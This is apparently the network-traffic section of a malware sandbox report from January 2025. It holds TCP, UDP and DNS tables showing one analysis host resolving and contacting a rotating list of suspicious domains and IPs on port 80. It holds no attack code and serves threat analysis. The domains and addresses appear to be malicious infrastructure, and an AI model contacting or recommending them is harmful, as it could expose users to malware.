                                                                              Jan 10, 2025 18:55:25.292427063 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.308222055 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:25.313086033 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.313235998 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919161081 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919243097 CET804972369.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:25.919332027 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:26.811470985 CET4972380192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.831626892 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.836416960 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:27.836489916 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.850214958 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:27.855014086 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.457796097 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.458282948 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:28.458327055 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:28.461482048 CET4972480192.168.2.869.57.163.64
                                                                              Jan 10, 2025 18:55:28.466218948 CET804972469.57.163.64192.168.2.8
                                                                              Jan 10, 2025 18:55:34.235105038 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.239931107 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:34.240020990 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.255475044 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:34.260397911 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.243802071 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.244112968 CET8049725101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:35.244239092 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:35.764703989 CET4972580192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.786802053 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.791682005 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:36.791965008 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.808756113 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:36.813513994 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.683824062 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.683862925 CET8049726101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:37.684101105 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:38.311661959 CET4972680192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.330967903 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.336123943 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:39.336231947 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.352354050 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:39.357239008 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:39.357451916 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303808928 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303828001 CET8049727101.32.205.61192.168.2.8
                                                                              Jan 10, 2025 18:55:40.303894997 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:40.858488083 CET4972780192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.891704082 CET4972880192.168.2.8101.32.205.61
                                                                              Jan 10, 2025 18:55:41.896583080 CET8049728101.32.205.61192.168.2.8
Jan 10, 2025 18:55:41.896651030 CET | 49728 |    80 | 192.168.2.8 | 101.32.205.61
Jan 10, 2025 18:55:41.909040928 CET | 49728 |    80 | 192.168.2.8 | 101.32.205.61
Jan 10, 2025 18:55:41.913975000 CET |    80 | 49728 | 101.32.205.61 | 192.168.2.8
Jan 10, 2025 18:55:42.895385027 CET |    80 | 49728 | 101.32.205.61 | 192.168.2.8
Jan 10, 2025 18:55:42.895437956 CET |    80 | 49728 | 101.32.205.61 | 192.168.2.8
Jan 10, 2025 18:55:42.895648003 CET | 49728 |    80 | 192.168.2.8 | 101.32.205.61
Jan 10, 2025 18:55:42.898171902 CET | 49728 |    80 | 192.168.2.8 | 101.32.205.61
Jan 10, 2025 18:55:42.903019905 CET |    80 | 49728 | 101.32.205.61 | 192.168.2.8
Jan 10, 2025 18:55:48.573584080 CET | 49729 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:48.578474045 CET |    80 | 49729 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:48.578589916 CET | 49729 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:48.595082045 CET | 49729 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:48.599909067 CET |    80 | 49729 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:50.108422041 CET | 49729 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:50.113810062 CET |    80 | 49729 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:50.113884926 CET | 49729 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:51.127633095 CET | 49730 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:51.132497072 CET |    80 | 49730 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:51.135379076 CET | 49730 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:51.151169062 CET | 49730 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:51.155999899 CET |    80 | 49730 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:52.655339956 CET | 49730 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:52.664184093 CET |    80 | 49730 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:52.664258003 CET | 49730 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:53.676345110 CET | 49731 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:53.681211948 CET |    80 | 49731 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:53.681329966 CET | 49731 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:53.696706057 CET | 49731 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:53.701756001 CET |    80 | 49731 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:53.701788902 CET |    80 | 49731 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:55.202255011 CET | 49731 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:55.207276106 CET |    80 | 49731 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:55.208488941 CET | 49731 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:56.221628904 CET | 49732 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:56.226439953 CET |    80 | 49732 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:56.226536989 CET | 49732 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:56.237102032 CET | 49732 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:56.241911888 CET |    80 | 49732 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:57.938616037 CET |    80 | 49732 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:57.938640118 CET |    80 | 49732 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:55:57.938769102 CET | 49732 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:57.942482948 CET | 49732 |    80 | 192.168.2.8 | 103.159.36.66
Jan 10, 2025 18:55:57.947309017 CET |    80 | 49732 | 103.159.36.66 | 192.168.2.8
Jan 10, 2025 18:56:03.154047012 CET | 49733 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:03.158894062 CET |    80 | 49733 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:03.158981085 CET | 49733 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:03.175050974 CET | 49733 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:03.179868937 CET |    80 | 49733 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:03.712727070 CET |    80 | 49733 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:03.712790966 CET |    80 | 49733 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:03.712869883 CET | 49733 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:04.686598063 CET | 49733 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:05.709470034 CET | 49734 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:05.714365959 CET |    80 | 49734 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:05.714749098 CET | 49734 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:05.732431889 CET | 49734 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:05.737236977 CET |    80 | 49734 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:07.234546900 CET | 49734 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:07.239660025 CET |    80 | 49734 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:07.239959955 CET | 49734 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:08.253530025 CET | 49735 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:08.258414030 CET |    80 | 49735 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:08.258512974 CET | 49735 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:08.277815104 CET | 49735 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:08.282638073 CET |    80 | 49735 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:08.282871962 CET |    80 | 49735 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:08.844739914 CET |    80 | 49735 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:08.844968081 CET |    80 | 49735 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:08.851279974 CET | 49735 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:09.782368898 CET | 49735 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:10.799145937 CET | 49736 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:10.804059982 CET |    80 | 49736 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:10.804495096 CET | 49736 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:10.814485073 CET | 49736 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:10.819355011 CET |    80 | 49736 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:11.365905046 CET |    80 | 49736 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:11.366074085 CET |    80 | 49736 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:11.366652966 CET | 49736 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:11.369251013 CET | 49736 |    80 | 192.168.2.8 | 103.168.172.37
Jan 10, 2025 18:56:11.374041080 CET |    80 | 49736 | 103.168.172.37 | 192.168.2.8
Jan 10, 2025 18:56:16.397469044 CET | 49737 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:16.402601957 CET |    80 | 49737 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:16.402679920 CET | 49737 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:16.420114040 CET | 49737 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:16.425102949 CET |    80 | 49737 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:17.936703920 CET | 49737 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:17.941914082 CET |    80 | 49737 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:17.941967964 CET | 49737 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:18.955493927 CET | 49738 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:18.960273027 CET |    80 | 49738 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:18.960395098 CET | 49738 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:18.977051973 CET | 49738 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:18.981806040 CET |    80 | 49738 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:20.484198093 CET | 49738 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:20.489458084 CET |    80 | 49738 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:20.492341042 CET | 49738 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:21.502684116 CET | 49739 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:21.507596016 CET |    80 | 49739 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:21.508452892 CET | 49739 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:21.525867939 CET | 49739 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:21.530723095 CET |    80 | 49739 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:21.530814886 CET |    80 | 49739 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:23.030524015 CET | 49739 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:23.035712957 CET |    80 | 49739 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:23.035768032 CET | 49739 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:24.049761057 CET | 49740 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:24.054532051 CET |    80 | 49740 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:56:24.054848909 CET | 49740 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:24.064799070 CET | 49740 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:56:24.069655895 CET |    80 | 49740 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:57:03.410238981 CET |    80 | 49740 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:57:03.410600901 CET |    80 | 49740 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:57:03.410897017 CET | 49740 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:57:03.415513992 CET | 49740 |    80 | 192.168.2.8 | 188.114.96.3
Jan 10, 2025 18:57:03.420336008 CET |    80 | 49740 | 188.114.96.3 | 192.168.2.8
Jan 10, 2025 18:57:08.480748892 CET | 49741 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:08.485635042 CET |    80 | 49741 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:08.485934019 CET | 49741 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:08.498878002 CET | 49741 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:08.503789902 CET |    80 | 49741 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:09.178152084 CET |    80 | 49741 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:09.179373980 CET | 49741 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:10.014771938 CET | 49741 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:10.019622087 CET |    80 | 49741 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:11.033788919 CET | 49742 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:11.038947105 CET |    80 | 49742 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:11.039028883 CET | 49742 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:11.056468010 CET | 49742 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:11.061467886 CET |    80 | 49742 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:11.524404049 CET |    80 | 49742 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:11.524564981 CET | 49742 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:12.561660051 CET | 49742 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:12.566585064 CET |    80 | 49742 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:13.580758095 CET | 49743 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:13.585993052 CET |    80 | 49743 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:13.586091042 CET | 49743 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:13.601264000 CET | 49743 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:13.606426954 CET |    80 | 49743 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:13.606502056 CET |    80 | 49743 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:14.240256071 CET |    80 | 49743 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:14.240369081 CET | 49743 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:15.108683109 CET | 49743 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:15.114031076 CET |    80 | 49743 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.128055096 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.132913113 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.132988930 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.146020889 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.150842905 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592042923 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592070103 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592082977 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592187881 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592200041 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592221975 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592223883 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.592235088 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592251062 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592262030 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592262030 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.592278004 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592284918 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.592295885 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
Jan 10, 2025 18:57:16.592304945 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.592324018 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.592358112 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.597779989 CET | 49744 |    80 | 192.168.2.8 | 84.32.84.32
Jan 10, 2025 18:57:16.602621078 CET |    80 | 49744 | 84.32.84.32 | 192.168.2.8
UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 18:53:53.803040981 CET | 52256 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:53:54.811597109 CET | 52256 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:53:55.811597109 CET | 52256 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:53:56.911185026 CET |    53 | 52256 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:53:56.911197901 CET |    53 | 52256 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:53:56.911207914 CET |    53 | 52256 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:54:12.935677052 CET | 63189 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:54:12.951277971 CET |    53 | 63189 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:54:27.221611977 CET | 52052 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:54:27.348675966 CET |    53 | 52052 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:55:19.981074095 CET | 63873 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:55:20.181246996 CET |    53 | 63873 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:55:33.472315073 CET | 63004 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:55:34.232165098 CET |    53 | 63004 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:55:47.912758112 CET | 53324 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:55:48.570662975 CET |    53 | 53324 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:56:02.956697941 CET | 59147 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:56:03.151307106 CET |    53 | 59147 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:56:16.378629923 CET | 50391 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:56:16.394387007 CET |    53 | 50391 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:57:08.425277948 CET | 57432 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:57:08.478301048 CET |    53 | 57432 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 18:57:22.252830982 CET | 65006 |    53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 18:57:22.507419109 CET |    53 | 65006 | 1.1.1.1 | 192.168.2.8
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 18:53:53.803040981 CET | 192.168.2.8 | 1.1.1.1 | 0x853e | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:54.811597109 CET | 192.168.2.8 | 1.1.1.1 | 0x853e | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:55.811597109 CET | 192.168.2.8 | 1.1.1.1 | 0x853e | Standard query (0) | www.3nhc3a.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:12.935677052 CET | 192.168.2.8 | 1.1.1.1 | 0x3628 | Standard query (0) | www.binjai77rtp11f.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:27.221611977 CET | 192.168.2.8 | 1.1.1.1 | 0x6487 | Standard query (0) | www.vietnamtour.pro | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:19.981074095 CET | 192.168.2.8 | 1.1.1.1 | 0xc6b5 | Standard query (0) | www.showyourstyle.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:33.472315073 CET | 192.168.2.8 | 1.1.1.1 | 0x95de | Standard query (0) | www.rwse6wjx.sbs | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:47.912758112 CET | 192.168.2.8 | 1.1.1.1 | 0x5929 | Standard query (0) | www.rokeyfashion.store | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:02.956697941 CET | 192.168.2.8 | 1.1.1.1 | 0x4b17 | Standard query (0) | www.lucelight.info | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:56:16.378629923 CET | 192.168.2.8 | 1.1.1.1 | 0xe4e | Standard query (0) | www.zrichiod-riech.sbs | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:57:08.425277948 CET | 192.168.2.8 | 1.1.1.1 | 0x2708 | Standard query (0) | www.absseguridad.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:57:22.252830982 CET | 192.168.2.8 | 1.1.1.1 | 0xef87 | Standard query (0) | www.daystarcafe.net | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 18:53:56.911185026 CET | 1.1.1.1 | 192.168.2.8 | 0x853e | No error (0) | www.3nhc3a.top | - | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:56.911197901 CET | 1.1.1.1 | 192.168.2.8 | 0x853e | No error (0) | www.3nhc3a.top | - | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:56.911207914 CET | 1.1.1.1 | 192.168.2.8 | 0x853e | No error (0) | www.3nhc3a.top | - | 20.2.208.137 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:12.951277971 CET | 1.1.1.1 | 192.168.2.8 | 0x3628 | No error (0) | www.binjai77rtp11f.xyz | - | 104.21.28.65 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:12.951277971 CET | 1.1.1.1 | 192.168.2.8 | 0x3628 | No error (0) | www.binjai77rtp11f.xyz | - | 172.67.144.150 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:27.348675966 CET | 1.1.1.1 | 192.168.2.8 | 0x6487 | No error (0) | www.vietnamtour.pro | - | 172.67.138.138 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:54:27.348675966 CET | 1.1.1.1 | 192.168.2.8 | 0x6487 | No error (0) | www.vietnamtour.pro | - | 104.21.54.126 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:20.181246996 CET | 1.1.1.1 | 192.168.2.8 | 0xc6b5 | No error (0) | www.showyourstyle.top | - | 69.57.163.64 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | www.rwse6wjx.sbs | b1-3-r11-gmhudx.t9d2quy5.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r11-gmhudx.t9d2quy5.shop | b1-3-r11.t9d2quy5.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r11.t9d2quy5.shop | b1-3-r111-s65psj.8uqm5xgy.shop | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r111-s65psj.8uqm5xgy.shop | b1-3-r11-nff52.alicloudddos.top | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r11-nff52.alicloudddos.top | b1-3-r111-s65psj.alicloudddos.top | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r111-s65psj.alicloudddos.top | b1-3-r111-55g56.kunlundns.top | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r111-55g56.kunlundns.top | b1-3-r111.kunlundns.top | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:55:34.232165098 CET | 1.1.1.1 | 192.168.2.8 | 0x95de | No error (0) | b1-3-r111.kunlundns.top | - | 101.32.205.61 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:55:48.570662975 CET | 1.1.1.1 | 192.168.2.8 | 0x5929 | No error (0) | www.rokeyfashion.store | rokeyfashion.store | - | CNAME (Canonical name) | IN (0x0001) | false
